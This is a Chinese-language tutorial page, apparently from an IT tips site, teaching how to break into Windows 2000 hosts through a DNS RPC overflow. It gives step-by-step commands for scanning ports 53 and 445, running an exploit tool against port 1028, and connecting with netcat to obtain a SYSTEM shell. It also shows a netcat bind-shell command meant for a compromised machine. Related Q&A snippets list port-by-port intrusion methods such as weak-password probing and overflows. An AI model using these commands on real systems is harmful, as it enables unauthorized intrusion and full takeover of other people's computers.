本文所分享的知识点是【教你如何DNS溢出漏洞入侵】,欢迎您喜欢我爱IT技术网所分享的教程、知识、经验或攻略,下面是详细的讲解。
教你如何DNS溢出漏洞入侵
前提是必须要开放53、445端口
1、选择superscan进行扫描,在端口列表中勾选上53、445端口,然后选择主机段进行扫描。
2、选择存在53、445端口的主机,在cmd下输入dns -t ip对主机进行特定漏洞端口扫描,“1028 :Vulnerability”表示
1028端口存在溢出漏洞,“os:window 2000”表示系统类型为window 2000。
3、在执行dns -t 2000all ip 1028 对目标主机进行溢出。connection to target host tcp port established 成功连接到主机的tcp端口上,
successfully bound to the vulnerale dcerpc interface 已经连接到对方的rpc端口上,os fingerprint result:windows 2000
系统指纹鉴定对方是wind2000系统,attack sent,check port 1100 攻击代码已经成功发送,并尝试连接1100端口。当出现最后这一句
提示语句的时候就意味着我们要成功了。
4、怎么连接对方的1100端口呢,当然我们要使用nc了。
5、nc全称叫"netcat",这是一个非常简单易用的基于tcp/ip协议(c/s模型的)的“瑞士军刀”。下面介绍一下它的几个常用功能
1、nc.exe -vv -l -p 6069,表示在本地6069端口上进行监听。-vv:显示详细的信息。-l:进行监听,监听入站信息。-p:监听所使用的
端口号。
2、正如我们遇到的情况,对方已经开放了一个端口。他在等待我们连接哦,连接上去会有什么呢?当然是system权限的shell了。
nc.exe -vv 127.0.0.1 5257,连接ip为127.0.0.1的5257端口。
3、还可以在本地监听端口的同时绑定shell,就相当于一个telnet服务端。通常这个命令在肉鸡上执行,然后当我们连接上去就可以获得
这个shell了。nc.exe -l -p 5257 -t -e cmd.exe,在本机5257端口上监听并绑定cmd.exe。-e 作用就是程序定向。-t以telnet的形式
来应答。
4、它可以用来手动对主机提交数据包(通常为80)端口,nc.exe -vv 127.0.0.1 80 <yan.txt,往ip为127.0.0.1的80端口提交yan.txt中
的内容。
6、介绍完nc.exe的四种常用方式,现在知道如何使用nc来链接对方的1100端口了吧,我们使用nc -vv 127.0.0.1 1100 连接对方的1100端口,
成功获得了一个具有system权限的cmdshell,现在想干什么就干什么了。
关于教你如何DNS溢出漏洞入侵的相关讨论如下:
相关问题:2007年的溢出漏洞有哪几种啊?
答:Microsoft Windows 动画图标文件栈溢出漏洞 发布日期:2007-04-02 受影响的软件及系统: ==================== Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows Server 2003 Microsoft Windows Vista 综述: ====== Microsoft W... >>详细
相关问题:端口的入侵方法,越详细越好。要有什么端口是什么...
答:21端口是默认的FTP端口,利用方式:弱口令探测/溢出目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多服务器就在沦丧于这个漏洞。 22端口是SSH远程登录协议,利用方式:弱口令探测23端口23端口是TLENET的默认端口,利用方式:弱... >>详细
相关问题:怎么关闭危险端口?
答:135、137-139、445、1433、3389,如何关闭他们?……...在出现的栏的上端出现IP设置/ DNS/WINS/选项,接着...sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵... >>详细
- 评论列表(网友评论仅供网友表达个人看法,并不表明本站同意其观点或证实其描述)
-